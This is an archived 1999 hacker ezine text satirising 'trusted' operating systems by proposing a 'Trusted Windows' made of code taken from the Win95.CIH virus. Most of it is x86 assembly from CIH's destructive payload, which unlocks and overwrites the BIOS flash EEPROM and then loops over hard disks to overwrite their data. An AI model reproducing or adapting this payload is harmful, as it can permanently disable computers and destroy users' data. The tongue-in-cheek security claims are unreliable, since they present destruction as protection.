💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › FK › trustrfc.t… captured on 2021-12-03 at 14:04:38.
-=-=-=-=-=-=-
Description of a Proposed Trusted Operating System by Wyzewun and Pneuma
Drawn up Tuesday, 31st August 1999
Abstract: Trusted Windows (Code Name: Gibson) will be based on the popular
Microsoft Windows Operating System, and will essentially be the same
Operating System, only it will have military grade security.
Proposed Liscence Agreement: If we were to be Open source, people would see
that we code like two year olds, and thus perhaps
be able to spot flaws in our code. For this
reason we will not be Open Source.
Also, rather than making our Operating System a
retail product, we will make it completely
illegal to use or possess. This will increase
security and lessen chances of people finding
bugs and loopholes.
Details: The Operating System will be small and elegant, and has had all of
the security holes in Windows removed. At the moment, the Operating
System consists of the following code...
; Trusted Windows v1.0 (Code Name: Gibson) by Wyzewun and Marc Satur9
; Super Hardcore secure Windows variant
; Kill BIOS EEPROM
mov bp, 0cf8h
lea esi, IOForEEPROM-@7[esi]
; Show BIOS Page in 000E0000 - 000EFFFF (64kb)
mov edi, 8000384ch
mov dx, 0cfeh
cli
call esi
; Show BIOS Page in 000F0000 - 000FFFFF (64kb)
mov di, 0058h
dec edx
mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
call esi
; Show the BIOS Extra ROM Data in Memory (000E0000 - 000E01FF) (512 bytes)
; The Section of Extra BIOS can be Writted...
lea ebx, EnableEEPROMToWrite-@10[esi]
mov eax, 0e5555h
mov ecx, 0e2aaah
call ebx
mov byte ptr [eax], 60h
push ecx
loop $
; Kill the BIOS Extra ROM Data in Memory (000E0000 - 000E007F) (80h Bytes)
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $
; Show and Enable the BIOS Main ROM Data (000E0000 - 000FFFFF) (128kb)
; Can be written
mov eax, 0f5555h
pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
; Kill the BIOS Main ROM Data in Memory (000FE000 - 000FE07F) (80h bytes)
mov ah, 0e0h
mov [eax], al
; Hide BIOS Page in 000F0000 - 000FFFFF (64kb)
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
call esi
; Kill HardDrive
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx
mov esi, esp
sub esp, 0ach
LoopOfKillHardDisk:
int 20h
dd 00100004h ; VXDCall IOS_SendCommand
cmp word ptr [esi+06h], 0017h
je KillNextDataSection
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
jmp LoopOfKillHardDisk
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
As you can see, this code was borrowed from the extremely popular addon pack
for Microsoft Windows - the Win95.CIH Virus. It succeeds in removing the BIOS
and the ability of the hard-drive to boot, two of the most common ways to
access your Windows workstation and thus be able to hack it.
Conclusion: Well, this is a revolutionary step in the field of Computer
Security which the world may not be ready for, but we are
confident that Trusted Windows is the only way to have a truly
secure Windows box and highly recommend that you employ it if you
wish to be secure. Only you can't have it. Giving it to you would
be a security threat. Sorry.